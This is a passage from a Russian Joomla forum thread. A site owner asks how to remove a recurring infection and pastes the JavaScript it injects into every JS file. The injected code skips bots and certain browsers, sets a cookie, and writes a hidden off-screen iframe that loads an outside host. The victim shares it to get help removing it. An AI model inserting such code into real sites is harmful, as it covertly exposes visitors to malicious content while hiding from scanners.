Вирус на сайте

ip-94

Осваиваюсь на форуме
27
0 / 0

Здравствуйте! У меня снова вирус на сайте. Из-за его я не могу добавить, редактировать, удалять материалы и не работают слайдшоу и другие спецэффекты. Похожий вирус у меня был этим летом. Но возился я с ним долго и уже не помню как его удалил. Сейчас похожий вирус, но долго с ним возиться нету времени. Вот вся суть вируса: он заражает все js файлы этим кодом "

Код

//beleiad9
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset))!== -1) {
return index;
}
return false;
}
function zzz_check_ua(){
var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK';
blackList = blackList.split('|');
var blackUA = false;
for (var i in blackList) {
if (stripos(navigator.userAgent, blackList[i])!==false) {
blackUA = true;
break;
}
}
return blackUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
var cookie = getCookie('nirajo819fyau82');
if (cookie == undefined) {
setCookie('nirajo819fyau82', true, 86400);
document.write('<iframe src="http://linkchat.ru/gfsarj.fajwrt?default" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>');
}
};
})();
//kolamne817

". Я удаляю его и он появляется снова и так каждый раз. У себя на ноуте нашёл штук 20 вирусов ( в том числе и некоторые php трояны), которые я удалил. Как я понимаю, что код, который я предоставил выше- это результат работы вируса, а не сам вирус. А сам вирус где-то прячется в php файлах. Кто-нибудь может, пожалуйста, подсказать, где мне искать вирус. Может у кого нибудь уже такой вирус был и он готов поделиться опытом? Спасибо большое!
Адрес сайта, если понадобиться могу дать. Так же смогу заплатить, если что.

Записан

wishlight

Гуру
5078
320 / 1
От 300 руб быстрый хостинг. Сервера.

На сайте пропал автоматический ресайз картинок для вывода на главной Автор mimoza	Ответов: 6 Просмотров: 3239	30.11.2017, 09:02:25 от SeBun
Неправильное формирование ссылок на сайте Автор wsergw	Ответов: 1 Просмотров: 2177	22.08.2017, 11:05:35 от voland
Не отображаются материалы и ссылки на сайте (joomla 1.5) Автор МарияЛ	Ответов: 1 Просмотров: 2399	17.03.2017, 20:33:56 от voland
Как найти "заразу" на сайте? Автор Naslednik	Ответов: 9 Просмотров: 2259	07.11.2016, 22:19:57 от altvvc
Как найти код редиректа на сайте? Автор Escander	Ответов: 12 Просмотров: 3890	21.04.2016, 18:49:29 от draff

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Похожие темы